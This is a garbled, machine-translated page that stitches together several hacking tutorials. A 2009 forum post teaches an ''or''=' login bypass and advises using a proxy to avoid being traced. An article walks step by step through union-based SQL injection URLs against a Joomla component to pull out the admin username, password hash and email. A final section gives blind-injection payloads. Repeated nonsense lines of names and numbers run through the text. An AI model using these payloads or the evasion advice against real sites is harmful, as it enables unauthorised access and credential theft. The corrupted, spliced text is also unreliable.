Hacking Websites using Sql Injection statement Focus to SQL Injection Moderators: 4L13N, Moderator, Contributor SQL Injection

Post a reply 3 posts • Page 1 of 1 Hacking Websites using Sql Injection statement by dj.topan »Mon Dec 21, 2009 4:22 pm SQL (Structured Query Language) is a language that is used for accessing data in relational databases. This language is a de facto standard language used in relational database management. At present almost all the existing database server supports this language to make its data management. This time I wanted to give a little guidance on how to hack websites using a simple sql injection, with no software and only use the statement "or". In this way, someone who called himself as xnuxer never deface the Commission website As we know, almost every website meliki special pages that can only be entered by the administrator. And every person who entered into the directory must enter a username and password as admin, and with tutors, we are trying to membye-pass the password. Okay not to extend the preamble, we just go on topic. . Consider me the following explanation: Suppose I have a website and to be able to configure, then I should go in as admin. And anggep aja usernamenya is Admin, with a striped cat and password to log in, then think - think sql statemennya as follows: Nowhere select * from admin username = 'Administrator' and Password = 'cat Striped' If I go into the root admin and fill in the username and password, automatically and surely I can "ngutak work on" my website. But what if i do not know the password? This never die, the core of the tutors this time, where we try membyepass or passing orders without knowing the password is password. Before that, I need a little explaining about the use of logic statement "or" where the statement can be flipped value of "false" to "true" so that, even though we were wrong to enter a password, still considered correct. For example, I use the statement or to sign in as admin, then the statement that my input is to fill in "or''= '(without the quotation marks at the beginning and end) on the username and password. Only by including such statement, I can go to my website without needing to know what your username and password, and please you to improvise to find the root admin page on a website. Or look at my previous posts. And good luck * Glosarry: Statement in this tutorial, synonymous with a command or command.

Note: Again I remind you to use a proxy or at least do not do it in a place where your regular browsing (home, office) or your internet cafe already know, better looking

Tini agus agus Lilik sold sold sold nunus havid Haris Haris havid glass plates sold suskandani Siswanto 10000000000000000000000000000000 glass dishes agus nunu suskandani Widi Yanti dias dreamily excommunicated person team of people hostile to their people 10000000000000000000000000000000000 0

Agus bin wardi silvi bin wardi Tini bin sariman

internet cafe you never visit the .. klo can search dipelosok DOWNLOAD http://www.ziddu.com/download/954555...ments.rar.htmldj.topan

Member Posts: 6 Joined: Sun Dec 20, 2009 6:08 pm Location: SQL Injection E-mail dj.topanWebsiteYIM Top -------------------------------------------------- -----------------------------Re: Website Hacking using Sql Injection statement by ali »Mon Dec 21, 2009 5:57 pm love examples dunk om?? hello

Agus wardi warni Silvi warni

Wardi Tini wardi
ali Class 1 Posts: 128 Joined: Tue April 28, 2009 3:47 pm YIM Top -------------------------------------------------- -----------------------------Re: Website Hacking using Sql Injection statement by vampire »Tue Dec 22, 2009 12:49 pm n example of a screen cutnya ad ga om vampire Class 1 Posts: 101 Joined: Sat March 22, 2008 10:04 pm WebsiteYIM

Implementation of SQL Injection in Joomla Line Break Author: Admin (231 Articles) Providing learning to you about Web Development, Graphic Design, etc, for free. Starting from a hobby for knowledge sharing web development in 2007 by 2 students. Contact: Homepage: http://www.ilmuwebsite.com Want to become a writer of articles in ilmuwebsite? Click>> List What if Admin lazy to update its web? What will happen if the admin does not consider the existing security risk? What if 'the choosen one' was an admin who does not know anything about a data security system? Irony indeed. In fact, sometimes there is an underestimate admin security system. What will happen if your server has a default configuration? What will happen, what would happen? And the myriad consequences of

the merger of these two words. What happens is that an attacker the opportunity to infiltrate into your website the more possible, rummaging through your server, even sometimes an attacker to take profit from the exploitation of the existing system. In many ways, including a wash dollar illicit manner. As performed by the carder. The author will explain how easy a website capitalize exploited only with the internet and internet browser of course, and little knowledge of sql queries. Need authors explain, the author is just an ordinary human being who has a minimum knowledge of data security systems. Yes, just recently, one of the components joomla proved dangerous diseases, malignant tumors that will spread throughout the body, and ultimately fatal. ~ ~ Sql injection bugs have been found in com_ds-syndicate, this is one example of the many fatal bugs contained in joomla. Beware! Errors occur because the components do not provide strict filtering in variable sql feed_id. Infiltration can be done, this simply happened because of variable feed_id error. And while writing this article there are some sites still have a disability like this. Yes, Jump aja ... http:// korban.com/index2.php? option = ds-syndicate & version = 1 & feed_id = 1 This url displays feeds as usual, but different as if we test his weaknesses, with the addition of quotation marks (') behind him. http:// korban.com/index2.php? option = ds-syndicate & version = 1 & feed_id = 1 '

andi agus wardi sariman
What happened? ... Error ... The next step is to search for the sequence table 'dssyndicate_feeds' to get the same form of error, and stopped when I get a different error:

index2.php? option = ds-syndicate & version = 1 & feed_id = 1 + order + by +1 / * -> same error index2.php? option = ds-syndicate & version = 1 & feed_id = 1 + order + by +2 / * -> same error index2.php? option = ds-syndicate & version = 1 & feed_id = 1 + order + by +3 / * -> same error index2.php? option = ds-syndicate & version = 1 & feed_id = 1 + order + by +4 / * -> same error index2.php? option = ds-syndicate & version = 1 & feed_id = 1 + order + by +20 / * -> same error ... index2.php? option = ds-syndicate & version = 1 & feed_id = 1 + order + by +21 / * -> different error note the different forms of his error when feed_id filled with 1 + order + by +21 / *, this is the benchmark for the next sql injection. The next step is the use of union, more details on the functions union, please read here. Furthermore, we test, whether the union function can be run on the url victims. index2.php? option = ds-syndicate & version = 1 & feed_id = 1 + union + all + select +1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20 + from + wc_users See the most recent of these lines, from + wc_users wc_users is a table that is retrieved from the database structure of joomla. Contains the user's login information. While this 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 obtained based writer who has been mentioned earlier. Yes after the url above on enter, you need to do is download the file, After that open the newly downloaded files with an editor like notepad, even though the xml file, but the authors still recommend to open it with notepad, not with the internet browser, because it allows for the reading of the results of the sql injection has been performed.

Adenan mbos mbok yem

Ita antong sariman wardi warni

See figure 2 in <title> tags: <title> 2 (18) </ title>

Do not mind the number (18) behind him, to note is his number 2. This means that based on union query results using this browser, you can use these numbers for the next 2. Like changing the number 2 with another character set to use it like seeing the mysql version that is used, you just go ahead, we will try to see the mysql version that is used by the victim. Use this url ...

Adenan mbos mbok yem Ita antong sariman wardi warni
http://korban.com/hack/joomla/index2.php?option=dssyndicate&version=1&feed_id=1+union+all+select+1, @ @ Version, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 + from + Wc_users note the number 2 is replaced with the phrase @ @ version, enter, then reopen the file has been downloaded in notepad, what happened? title changed to the mysql version, the authors found: <title> 5.0.33 (18) </ title> Mysql version 5.0.33, up here you have a database user can freely explore. What does an attacker's next? yes, get the admin username and password. . Capture username and password using sql injection forcibly This can be done individually, or all at once. Query to display the username using sql injection bugs on this one, you simply replace the @ @ version, which had been with the username field that

stores information of course, use this url:

http://korban.com/hack/joomla/index2.php?option=dssyndicate&version=1&feed_id=1+union+all+select+1, username, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 + from + wc_users run the url, download the file, then reopen with a notepad. The result is the username of the database ... <title> admin (18) </ title> Or it could also displayed information on usernames, passwords, emails, and user_type once, use the url like this: http://korban.com/hack/joomla/index2.php?option=dssyndicate&version=1&feed_id=1+union+all+select+1, concat (username, 0 × 3a, password, 0 × 3a, email, 0 × 3a, usertype), 3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 + from + wc_users note, string username, replaced by concat (username, 0 × 3a, password, 0 × 3a, email, 0 × 3a, usertype), concat use mengconvert here is a hex, or special characters into ascii form, so, what happens later are:

0 × 3a changed to a colon (:), reopen the file results from the url above. The authors get is information like this: admin: bd3ca378488e00055d5b23df1252e443: EbnV8pXgTqIgApjK: alkemail@gmail.com: Super Administrators If the sort: Username: admin Password (hash): bd3ca378488e00055d5b23df1252e443: EbnV8pXgTqIgApjK Email: alkemail@gmail.com User type: Super Administrators That in doing next is to try to crack a password, because it is still in the form of hash, in other words that are still encrypted passwords. . Yups, decision by force username and password has happened, her attacker returned to find a way how to get the original password, how to crack the password hash with those.

Tini

agus agus Lilik sold sold sold nunus havid Haris Haris havid glass plates sold suskandani Siswanto 10000000000000000000000000000000 glass dishes agus nunu suskandani Widi Yanti dias dreamily excommunicated person team of people hostile to their people 10000000000000000000000000000000000 0
This is proof of a web so easily taken over by the attacker, the result of a lazy admin to patch the systems in place. In the next article the author would run a simple concept for joomla crack passwords using php. Wait a sequel .... For experimental purposes, please download the file here. http://joomlacode.org/gf/download/frsrelease/6828/22538/Joomla_1.0.15-StableFull_Package.zip http://www.unair.info/ilmuwebsite/hack/joomla/com_ds-syndicate.tar.gz greetz: b_scorpio cement business, which the staff ilmuwebsite ngurus thesis Peterpanz the inconvenience ngurus thesis also, mr.freeman, for jojo too, Najwa [at] STSN, dr.emi, Denice the manace, Phii_ FadliHow to exploit the SQL Injection Attack Exploiting an SQL Inject attack involves solving a puzzle that is a cross between Hangman and 20 Questions. It needs a little understanding of SQL and a great deal of

cunning.

Try your Hacking skills against this test system. It takes you through the exploit step-bystep. The SQL Injection attack allows external users to read details from the database. In a well designed system this will only include data that is available to the public anyway. In a poorly designed system this may allow external users to discover other users' passwords. Try these steps: To gain access and find a user name. Enter the string as both user name and password in the frame on the right. This should get you logged in as a user (jake happens to be the first user in the table). This tells you that Jake is a user and it allows you to access his account - but it does not tell you his password. Find out if Jake's password includes the letter "w". Enter xxx as user name and enter the following string as the password: ' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''=' Find out if Jake's password has "w" as the third letter. Enter xxx as user name and enter the following string as the password: ' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '__w%') AND ''='

Diagnosis

In which we explain how to identify a web site that may be vulnerable to an SQL Injection attack. Causes and Cures for SQL Injection Vulnerability Explains the programming error that gives rise to the problem. Exploit: Gain unauthorized Access In which we explain how to get past a login screen without knowing a user name or a password. Exploit: Find a password. In which we explain how to discover the password for a user if you know the name of the password table and a user account. Exploit: Find a user account. In which we explain how to discover the user names in the password table given that we know the name of the password table. Exploit: Find the names of the tables. In which we discover the names of the tables available for viewing. this might include the name of the password table. WARNING: In many countries (including UK) it is illegal to use this attack. I've set up a vulnerable test system here so that you can have a go. I promise not to prosecute. Up to 6 months in jail for unauthorised access Up to 5 years if with intent to commit further offences

-------------------------------------------------------------------------------Bragging Board If you can figure out a username and password combination then you can brag about it here" Note that phpBB is NOT vulnerable to an SQL

Injection attack. But to use this one you

Tini agus agus Lilik sold sold sold nunus havid Haris Haris havid glass plates sold suskandani Siswanto 10000000000000000000000000000000 glass dishes agus nunu suskandani Widi Yanti dias dreamily excommunicated person team of people hostile to their people 10000000000000000000000000000000000 0

Tini agus agus Lilik sold sold sold nunus havid Haris Haris havid glass plates sold suskandani Siswanto 10000000000000000000000000000000 glass dishes agus nunu suskandani Widi Yanti dias dreamily excommunicated person team of people hostile to their people 10000000000000000000000000000000000 0

Tini agus agus Lilik sold sold sold nunus havid Haris Haris havid glass plates sold suskandani Siswanto 10000000000000000000000000000000 glass dishes agus nunu suskandani Widi Yanti dias dreamily excommunicated person team of people hostile to their people 10000000000000000000000000000000000 0